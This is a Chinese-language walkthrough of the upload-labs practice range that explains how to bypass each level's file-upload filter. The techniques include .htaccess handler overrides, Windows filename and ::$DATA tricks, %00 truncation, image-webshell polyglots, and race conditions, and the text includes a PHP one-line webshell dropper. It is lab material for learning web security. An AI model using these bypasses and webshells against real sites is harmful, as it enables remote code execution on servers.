文件上传方法总结

以upload-labs讲解   

项目地址https://github.com/c0ny1/upload-labs/releases

每道题都要通过上面这张图判断文件校验的方式，才能有大体绕过思路

PASS 01      前端js校验

尝试上传符合条件的文件，将一句话木马后缀改为jpg，抓包修改成php文件。

PASS 02       MIME文件类型校验

提示文件类型不正确，可能是MIME校验

PASS 03        php多种扩展名绕过

上传php文件时出现提示，php被加入了黑名单，并且会将上传的文件重新命名，无法通过上传.htaccess文件绕过，大小写失败了，尝试上传php3,phtml等其他扩展名文件绕过黑名单限制

PASS 04     上传.htaccess文件绕过

通过上传jpg图片发现文件名并未改变，但是各种扩展名大小写都被限制，尝试上传.htaccess文件，内容为

SetHandler application/x-httpd-php

将所有文件解析为ph执行，此时上传文件改为jpg格式成功上传，查看解析

PASS 05    后缀名大写绕过

将后缀名大写绕过

PASS 06      Windows特性文件命名规则

相比前几题，大小写绕过和上传.htaccess文件已经行不通了。查看源代码没有去掉末尾的空格，那可以利用Windows的特性，Windows下xx.jpg[空格]或xx.jpg.这两类文件都是不允许存在的，若是这样命名，Windows会默认除去空格或点。

上传1.php,抓包修改为1.php[空格]

PASS 07       Windows特性文件命名规则

原理同pass 06，通过Windows文件命名规则绕过，抓包将文件改为1.php.即可

综合pass06和pass07，碰到此类型的都可以将文件修改为1.php[空格].

PASS 08      Windows特性   ::$DATA绕过

在php+Windows的情况下：如果文件名+"::$DATA" 会把 "::$DATA"之后的数据当成文件流处理，不会检测后缀名且保持”::$DATA”之前的文件名

抓包修改1.php为如图所示

上传成功后查看链接，链接为http://192.168.135.144/upload/202004231705477566.php::$data

查看http://192.168.135.144/upload/202004231705477566.php 即为已上传文件

PASS 09

从源码可以看出这次拼接的路径是$file_name的值，结合Windows特性构造文件

PASS 10     后缀名双写绕过

通过上传1.php文件后查看文件后缀.php被过滤，猜测可能之过滤一次，尝试双写后缀名绕过，这里双写要注意：1.pphphp和1.phphpp产生的文件是不同的，过滤是从左往右的，所以1.phphpp会生成文件1.hpp

PASS 11     %00截断绕过

通过测试得知是后端白名单限制，对内容并未过滤

代码分析发现最终返回的图片链接是”存储路径名+重命名后的文件名“，看到这个我们可以联想到使用%00截断路径。

截断条件：1.php版本小于5.3.4        2.php.ini的magic_quotes_gpc为OFF状态（默认为OFF）

访问链接http://192.168.135.144/upload/1.php  上传成功

PASS 12     %00截断绕过

同pass 11一样使用00截断绕过，但这里是通过POST方式，由于POST不像GET可以自动解码%00，所以需要手动解码，如下

访问http://192.168.135.144/upload/2.php   上传成功

PASS 13   文件内容头部检测

分析代码可知通过读文件的前2个字节判断文件类型，因此直接上传图片马即可，制作方法：

copy 1.jpg /b + shell.php /a webshell.jpg

成功上传后利用的话还需结合文件包含漏洞。

PASS 14     文件内容头部检测

通过代码得知这里使用getimagesize获取文件类型，直接上传图片马可绕过

PASS  15     图片马绕过

这里用到php_exif模块来判断文件类型，同样可以利用图片马直接绕过

PASS 16    图片二次渲染

绕过思路：对比上传前和上传后的图片的差异，找到相同数据同时又是非图片数据区的地方，在此处写入恶意代码。不同的图像类型插入方式有区别。

GIF

GIF的二次渲染绕过是最简单的，将源文件和二次渲染过的文件进行比较，找到源文件中没有被修改的那段区域，写入PHP代码即可。 使用工具winhex

PNG和JPG通过脚本可以生成，使用方法：

1.先将一张正常的jpg图片上传，上传后将服务器存储的二次渲染的图片保存下来。

2.将保存下来经过服务器二次渲染的那张jpg图片，用脚本进行处理生成payload.jpg

3.然后再上传payload.jpg

PASS 17  利用竞争条件绕过

可以从代码看到，文件是先上传再判断是否是合法文件，不是则将文件删除

绕过思路：可以上传一个php文件，文件的功能是写一句话木马，然后再重复访问该php文件，目的是卡在删除之前执行该文件，上传的php文件代码如下：

<?php

fputs(fopen('eval.php','w'),'<?php eval($_POST[cmd]);?>');

?>

<?php $f= fopen ("shell.php","w") ; fputs ($f,'<?php phpinfo();?>'); ?>

PASS 18   条件竞争上传图片马

PASS  19   利用/.达到00截断的效果

move_uploaded_file会忽略掉文件末尾的/.

因此可以构造smile.php/. 达到00截断的作用

PASS 20  数组+/.绕过

$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
    //检查MIME
    $allow_type = array('image/jpeg','image/png','image/gif');
    if(!in_array($_FILES['upload_file']['type'],$allow_type)){
        $msg = "禁止上传该类型文件!";
    }else{
        //检查文件名
        $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
        if (!is_array($file)) {
            $file = explode('.', strtolower($file));
        }

        $ext = end($file);
        $allow_suffix = array('jpg','png','gif');
        if (!in_array($ext, $allow_suffix)) {
            $msg = "禁止上传该后缀文件!";
        }else{
            $file_name = reset($file) . '.' . $file[count($file) - 1];
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $msg = "文件上传成功！";
                $is_upload = true;
            } else {
                $msg = "文件上传失败！";
            }
        }
    }
}else{
    $msg = "请选择要上传的文件！";
}

可以发现$file_name经过reset($file) . '.' . $file[count($file) - 1];处理。

如果上传的是数组的话，会跳过$file = explode('.', strtolower($file));。
并且后缀有白名单过滤。

而最终的文件名后缀取的是$file[count($file) - 1]，因此我们可以让$file为数组。
$file[0]为smi1e.php/，也就是reset($file)，然后再令$file[2]为白名单中的jpg。
此时end($file)等于jpg，$file[count($file) - 1]为空。
而 $file_name = reset($file) . '.' . $file[count($file) - 1];，也就是smi1e.php/.，最终move_uploaded_file会忽略掉/.，最终上传smi1e.php。